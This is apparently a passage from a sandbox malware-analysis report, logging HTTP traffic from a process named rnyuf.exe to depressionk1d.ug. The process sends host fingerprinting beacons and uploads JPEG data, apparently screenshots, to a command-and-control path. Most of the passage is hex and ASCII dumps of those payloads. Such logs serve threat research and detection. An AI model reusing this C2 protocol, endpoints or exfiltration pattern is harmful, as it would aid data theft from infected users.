                          Data Ascii: R9JuoSZE (aJ((1@(((E8RRi {'[+yer b>d1{uGoMJ+(V([6`\E6EE+huK]P.=8pk$sl8j=>Fu_6;5t,E'1C].?'
                          Nov 12, 2021 22:24:36.272458076 CET17248OUTData Raw: 0a 70 a6 9a 70 eb 40 05 14 51 4c 91 69 69 29 69 80 51 45 2d 02 0a 5a 4a 05 31 0f 14 e0 6a 31 4e aa b8 99 26 69 c0 d4 40 d3 85 52 64 b4 48 0d 2e 01 a6 66 97 35 57 44 8a 63 06 9a 61 cd 38 35 3c 3d 3b 21 5d a2 b3 43 8a 61 8c 8a b8 48 34 98 06 a5 c1
                          Data Ascii: pp@QLii)iQE-ZJ1j1N&i@RdH.f5WDca85<=;!]CaH4x"U4Oe{DVELa"+CLf)@q.1Kb+Z)hR\RS.)qN;P(\f(?hG1Rmm;F);TiqSqRIqKLR\
                          Nov 12, 2021 22:24:36.272511959 CET17256OUTData Raw: f6 85 c6 7d 3c c7 c7 e9 8a f0 b2 0d 7d 23 f1 7e da 1b 2f 86 02 d6 04 d9 0c 53 c2 88 be 80 66 be 72 35 85 39 2a 8e 53 5d 5b 67 4c a2 e9 c6 30 7d 12 44 78 22 96 9d 4b 8c d6 96 22 e3 45 14 ed a2 8d 94 ec c2 e3 68 a5 d9 46 d3 e9 40 09 41 a4 20 83 45
                          Data Ascii: }<}#~/Sfr59*S][gL0}Dx"K"EhF@A E (Q@Q@(4bF(QKE0-PEP ZQIE1EP(hJ:S-1(!ii1J))h-SRhAK@u1/zLSZJZb)iQE.)QEZpTHPiL
                          Nov 12, 2021 22:24:36.272528887 CET17257OUTData Raw: 46 da 9b 6d 1b 73 47 28 73 10 e2 97 15 2f 97 46 ca 5c a1 cc 88 88 a5 c5 49 b6 8d b4 f9 58 73 11 e2 8d a0 f6 a9 31 46 da 5c a1 cc 44 62 43 fc 34 c3 6e 87 d4 55 8d b4 62 8e 44 35 36 8a bf 66 f4 34 df b3 b8 e9 57 36 9a 50 29 7b 34 c6 aa 32 87 96 c3
                          Data Ascii: FmsG(s/F\IXs1F\DbC4nUbD56f4W6P){424)A?J^Rj}Ol~SM$>t''>Y4S2XRZXuPQKHN)qLLZZ@)UR@Sbu%-Q"LE- T&-:KT)E4SXNHKIE2G
                          Nov 12, 2021 22:24:36.272589922 CET17263OUTData Raw: 11 46 40 3c 93 c0 e0 11 f8 d7 7d 0f 8b ac 2e 6d bc 45 78 f7 70 89 f4 fb 99 5e c3 f7 83 e7 1e 57 96 bb 7d 41 20 9e 3d 45 67 56 a5 58 ca d1 db fc f4 fc ce aa 70 83 8d d9 43 c0 f6 9a 72 78 76 e6 1b 8b 1b bd 4a 38 b5 29 d2 29 2d e3 3d 02 44 32 40 6e
                          Data Ascii: F@<}.mExp^W}A =EgVXpCrxvJ8))-=D2@n3]tOu]s^E^3"7n=um6/;Y~Q(we6mhVvI_0W7MZ"~OJ`WNfr7C-4RiiSA2EN


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          362192.168.2.450195178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:40.021142006 CET17346OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          363192.168.2.450199178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:40.577797890 CET17352OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:40.578102112 CET17353OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:40.578550100 CET17363OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:40.578799009 CET17365OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:40.601540089 CET17368OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:40.601605892 CET17371OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:40.601636887 CET17376OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:40.601665974 CET17379OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:40.601696014 CET17386OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:40.601754904 CET17391OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:24:40.625559092 CET17394OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          364192.168.2.450214178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:44.168960094 CET17496OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          365192.168.2.450215178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:45.398073912 CET17498OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:45.398185968 CET17498OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:45.398377895 CET17508OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:45.398524046 CET17511OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:45.420866013 CET17517OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:45.420909882 CET17525OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:45.420928001 CET17530OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:45.420942068 CET17534OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:45.423630953 CET17537OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:45.443609953 CET17543OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:45.443736076 CET17567OUTData Raw: af 69 17 b3 17 b1 9a dd 11 81 9a 90 51 b4 8a 50 33 45 ca 51 68 75 28 a4 c5 38 0a 9b 94 28 a7 52 01 4a 05 4b 2d 21 40 a7 81 4d 02 9e 2a 59 68 70 1c 57 15 f1 04 ff 00 c4 ba 3f fa ea 3f 91 ae d8 57 0f f1 04 ff 00 c4 bd 3f eb b0 fe 54 e9 ee 57 54 78
                          Data Ascii: iQP3EQhu(8(RJK-!@M*YhpW??W?TWTx-&)=y#]*t/<_{_)+4dG+u,C*}?Z1?T,g8G*eYo-5_3bMVF?og


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          366192.168.2.450216178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:48.314733982 CET17609OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          367192.168.2.450217178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:48.757170916 CET17609OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----72f5cde377fbc84156c9f93b3b5c40e7
                          Host: depressionk1d.ug
                          Content-Length: 106960
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:48.757460117 CET17609OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 66 35 63 64 65 33 37 37 66 62 63 38 34 31 35 36 63 39 66 39 33 62 33 62 35 63 34 30 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------72f5cde377fbc84156c9f93b3b5c40e7Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:48.757731915 CET17619OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:48.757891893 CET17622OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:48.781491041 CET17641OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:48.781783104 CET17648OUTData Raw: 96 2d 28 a4 02 9d 54 26 14 52 e2 80 29 92 00 53 80 a0 0a 5c 53 13 16 96 90 0a 70 15 44 80 14 a0 50 05 3b 14 c4 d8 82 9d 49 4b 54 48 b4 ea 68 a7 53 24 51 4b 48 05 38 55 09 8b 4e a6 d2 d5 22 47 8a 51 4d 14 ea 68 96 2d 28 a6 d3 a9 92 38 52 d2 51 4c
                          Data Ascii: -(T&R)S\SpDP;IKTHhS$QKH8UN"GQMh-(8RQL(x4PhNfdQ$F;>hxjx4h58z baFosRK&D>C5q^}SS;mZ_hm*^>=MdFIPEk5Hs;RV|
                          Nov 12, 2021 22:24:48.804421902 CET17661OUTData Raw: a4 52 e6 e8 ba 98 24 9a 25 2c f1 88 c2 ee 03 e5 65 0d bc f2 01 c6 0f 1c fc 17 72 5b c3 aa aa 42 4b 6a 30 f9 59 df 8f 2b f7 c9 26 7a 73 f7 31 db ae 6b 56 7f 11 45 24 b7 5a 8c 7a 4b 26 b9 77 0b c7 35 d1 b8 cc 21 9d 76 bc 89 16 d0 43 b0 27 92 e4 02
                          Data Ascii: R$%,er[BKj0Y+&zs1kVE$ZzK&w5!vC'ohV[kA!\8j6y6Z&|(HTS{ VC-CQKH4Zh4!hb(--4SQKMJ)x4sQuQ-J
                          Nov 12, 2021 22:24:48.804526091 CET17683OUTData Raw: 81 0f 02 a4 07 9a d2 26 72 24 ed 4e 14 cc e6 97 fc 6a c8 b0 fa 75 30 52 e7 14 c8 b0 ea 4a 4c d2 8a 00 5a 5c d2 51 40 0a 0d 48 2a 3a 70 e2 99 2c 71 1c 52 52 83 9a 43 c1 a0 43 bb 52 f6 a4 eb 4a 29 92 28 e6 82 28 a3 34 08 3a d2 8f ad 14 a0 50 02 f6
                          Data Ascii: &r$Nju0RJLZ\Q@H*:p,qRRCCRJ)((4:P,ZSM@VRQ@)MGOf??Tg\Uk?CZ^R]')(CRh(e<R(QQ@c2u[6KI^lW^f?ZZ
                          Nov 12, 2021 22:24:48.804554939 CET17688OUTData Raw: 30 ad 23 12 25 21 02 8a 53 f2 f6 a7 85 53 d0 d2 12 a3 a9 ad 2c 65 72 12 c4 f6 a6 ed 26 a5 f3 23 fe f0 14 7d a2 15 fe 21 53 a7 56 5a bf 44 11 c6 7d 2a d2 44 6a b7 db e1 5e 9c d2 1d 4d 7b 0a a5 38 2e a4 4a 15 1f 42 ef 97 8a 70 41 eb 59 a7 53 27 a2
                          Data Ascii: 0#%!SS,er&#}!SVZD}*Dj^M{8.JBpAYS'a%=0(57OW?/niuf4F+cOsK6C>5J3Ga"ihz-!sVx4Gc\d!;Hzq= i$uRdp5]\
                          Nov 12, 2021 22:24:48.804575920 CET17691OUTData Raw: 7b c5 28 7a 09 b3 25 a7 66 a1 dd 4b ba 95 85 ca 4d ba 97 75 43 9f 7a 5d f4 ac 4f 29 3e 69 77 54 1b f1 de 9a 65 a3 94 5c 85 9d c2 8d f8 eb 54 da 6c 54 2d 73 ef 4b 94 a5 49 b3 41 a7 03 bd 42 d7 40 77 ac e7 b9 3e b5 56 4b 9f 7a 57 48 de 18 6b 9a 32
                          Data Ascii: {(z%fKMuCz]O)>iwTe\TlT-sKIAB@w>VKzWHk2uMyTe95%Of{GZyrO4&{vzR}:v$-MPX9AZ=#X'gP-mL\95{6rj.N0!nB8dz}JBygmb)stdCD1M|
                          Nov 12, 2021 22:24:48.804637909 CET17699OUTData Raw: 4e bb 52 f1 f3 dc fd a8 e9 da 25 95 93 5c ad b4 4e 26 8e 3b a8 d6 28 63 da a8 a9 2a 10 06 7e 6c f5 e0 0e d9 aa f7 5e 2f 4d 56 4b 91 aa e9 5e 74 17 91 41 f6 b5 b7 99 60 76 9e 15 2a b2 c6 42 15 4c a9 c1 5d a4 63 3d 38 c7 35 45 2f 63 1f eb fa fe 9e
                          Data Ascii: NR%\N&;(c*~l^/MVK^tA`v*BL]c=85E/cdt5lboh2o-t<ov..-,ci..-[p#(Q_V6}{;]x`6&//i6v[Yi..1\UJSN


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          368192.168.2.450218178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:52.491756916 CET17719OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:53.516319990 CET17830INHTTP/1.1 508 unused
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:53 GMT
                          Content-Type: text/html
                          Content-Length: 1226
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Retry-After: 14400
                          Last-Modified: Tue, 02 Jan 2018 12:36:34 GMT
                          ETag: "6500109-4ca-561ca595b5880"
                          Accept-Ranges: bytes
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 20 2d 20 cf f0 e5 e2 fb f8 e5 ed e8 e5 20 e2 fb e4 e5 eb e5 ed ed fb f5 20 f0 e5 f1 f3 f0 f1 ee e2 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 